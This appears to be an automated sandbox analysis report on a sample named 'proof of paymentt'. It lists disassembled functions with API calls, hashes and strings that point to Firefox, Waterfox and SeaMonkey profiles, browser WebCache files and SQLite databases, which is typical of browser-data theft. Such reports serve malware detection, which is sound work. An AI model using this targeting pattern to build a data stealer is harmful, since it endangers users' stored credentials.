Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403DDA

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Waterfox, xrefs: 00403D73
Waterfox\Profiles, xrefs: 00403D40, 00403D5B

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Waterfox$Waterfox\Profiles
API String ID: 3527940856-11920434
Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403E50
memset.MSVCRT ref: 00403E65
memset.MSVCRT ref: 00403E7A
memset.MSVCRT ref: 00403E8F
memset.MSVCRT ref: 00403EA4

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403F6B

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Mozilla\SeaMonkey, xrefs: 00403F04
Mozilla\SeaMonkey\Profiles, xrefs: 00403ED1, 00403EEC

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 3527940856-2068335096
Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A

Uniqueness

Uniqueness Score: -1.00%

Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403FE1
memset.MSVCRT ref: 00403FF6
memset.MSVCRT ref: 0040400B
memset.MSVCRT ref: 00404020
memset.MSVCRT ref: 00404035

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 004040FC

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Mozilla\Firefox, xrefs: 00404095
Mozilla\Firefox\Profiles, xrefs: 00404062, 0040407D

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 3527940856-3369679110
Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A

Uniqueness

Uniqueness Score: -1.00%

Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004444E3

Strings

no such vfs: %s, xrefs: 0044452B
temp, xrefs: 00444623
main, xrefs: 00444613
RTRIM, xrefs: 00444573
NOCASE, xrefs: 004445A4
BINARY, xrefs: 0044454A, 0044454F, 0044455B, 00444567, 0044458C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A

Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA

memset.MSVCRT ref: 004033B7
memcpy.MSVCRT ref: 004033D0
wcscmp.MSVCRT ref: 004033FC
_wcsicmp.MSVCRT ref: 00403439

Strings

0.@, xrefs: 00403399
, xrefs: 004032DF

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
String ID: $0.@
API String ID: 3030842498-1896041820
Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B

Uniqueness

Uniqueness Score: -1.00%

Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 2941347001-0
Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403C09
memset.MSVCRT ref: 00403C1E

Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732

wcscat.MSVCRT ref: 00403C47

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

wcscat.MSVCRT ref: 00403C70

Strings

Mozilla\Profiles, xrefs: 00403C41
Mozilla\Firefox\Profiles, xrefs: 00403C6A

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memsetwcscat$Closewcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 3249829328-1174173950
Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A824
GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
wcscpy.MSVCRT ref: 0040A854
wcscat.MSVCRT ref: 0040A86A
LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 669240632-0
Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00414458
_snwprintf.MSVCRT ref: 0041447D
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3

Strings

"%s", xrefs: 0041446C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2

Strings

kernel32.dll, xrefs: 00413CB0
GetProcessTimes, xrefs: 00413CBF

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99

Uniqueness

Uniqueness Score: -1.00%

Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004087D6

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC

memset.MSVCRT ref: 00408828
memset.MSVCRT ref: 00408840
memset.MSVCRT ref: 00408858
memset.MSVCRT ref: 00408870
memset.MSVCRT ref: 00408888

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
String ID:
API String ID: 2911713577-0
Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041F202
memcmp.MSVCRT ref: 0041F22D
memcmp.MSVCRT ref: 0041F299

Strings

@ , xrefs: 0041F293
SQLite format 3, xrefs: 0041F220

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88

Uniqueness

Uniqueness Score: -1.00%

Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4

memset.MSVCRT ref: 00414C87
RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: AddressCloseProcVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2705122986-2036018995
Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE

Uniqueness

Uniqueness Score: -1.00%

Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004110FD
qsort.MSVCRT ref: 004111A7

Strings

/sort, xrefs: 004110F8
/nosort, xrefs: 0041115D

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E60F
memset.MSVCRT ref: 0040E629

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memsetwcslen$AttributesFilewcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
API String ID: 3354267031-2114579845
Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998

Uniqueness

Uniqueness Score: -1.00%

Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
SizeofResource.KERNEL32(?,00000000), ref: 004148D4
LoadResource.KERNEL32(?,00000000), ref: 004148E4
LockResource.KERNEL32(00000000), ref: 004148EF

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688

Uniqueness

Uniqueness Score: -1.00%

Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0044DF01
??3@YAXPAX@Z.MSVCRT ref: 0044DF11
??3@YAXPAX@Z.MSVCRT ref: 0044DF21
??3@YAXPAX@Z.MSVCRT ref: 0044DF31

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D

Uniqueness

Uniqueness Score: -1.00%

Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043AA3D
memset.MSVCRT ref: 0043AE4A

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 004175D0
FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9

Strings

}A, xrefs: 004175B9

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID: }A
API String ID: 1821831730-2138825249
Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524

Uniqueness

Uniqueness Score: -1.00%

Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 004125C3
DeleteObject.GDI32(00000000), ref: 004125E7

Strings

r!A, xrefs: 004125BD

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@DeleteObject
String ID: r!A
API String ID: 1103273653-628097481
Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19

Uniqueness

Uniqueness Score: -1.00%

